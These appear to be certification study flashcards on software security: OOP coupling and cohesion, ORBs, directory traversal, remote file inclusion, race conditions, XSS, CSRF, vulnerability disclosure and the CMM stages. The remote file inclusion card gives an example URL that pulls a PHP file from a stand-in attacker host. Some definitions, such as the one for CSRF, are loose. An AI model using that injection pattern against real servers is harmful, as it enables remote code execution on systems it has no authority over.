Domain 8: Software Security Flashcards
- OOP Term
- Used to describe level of an object’s dependence on other objects
Coupling
- OOP Term
- Used to describe the level of an object’s independence of other objects
Cohesion
- OOP Terms
- Object that greatly depends on another object
High Coupling and Low Cohesion
- OOP Terms
- Object that is mostly independent from other objects
High Cohesion and Low Coupling
- Used to locate objects act as search engines
- Connects programs to programs
- i.e. COM, DCOM, CORBA
Object Request Brokers (ORBs)
Escaping from the root of the web server (i.e. /var/www) into the regular file system by referencing directories such as “../’’”
Directory Path Traversal
Altering normal PHP URLs and variable to include and execute remote content
i.e. http://good.example.com?file=http://evil.example.com/bad.php
Remote File Inclusion (RFI)
Attacker attempts to alter a condition after it has been checked by the OS, but before it is used
Time of check/Time of use (TOC/TOU) attacks aka Race conditions
Leverages third-party execution of scripting languages within the security context of a trusted site
Cross-site scripting (XSS)
Leverages a third-party redirect of static content within the security context of a trusted site
Cross-site request forgery (CSRF)
Describes actions taken by the security researcher after discovering a software vulnerability
Disclosure
Practice of releasing vulnerability details publicly
Full disclosure
Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available
Responsible disclosure
- Framework intended help software organizations improve the maturity and quality of the software process
- Categorizes 5 stages organization software processes go through to reach maturity
- Maturity framework for evaluating and improving the software development process
Software Capability Maturity Model (CMM)
Name the 5 stages of the Software Capability Maturity Model (CMM)
- Initial
- Repeatable
- Defined
- Managed
- Optimizing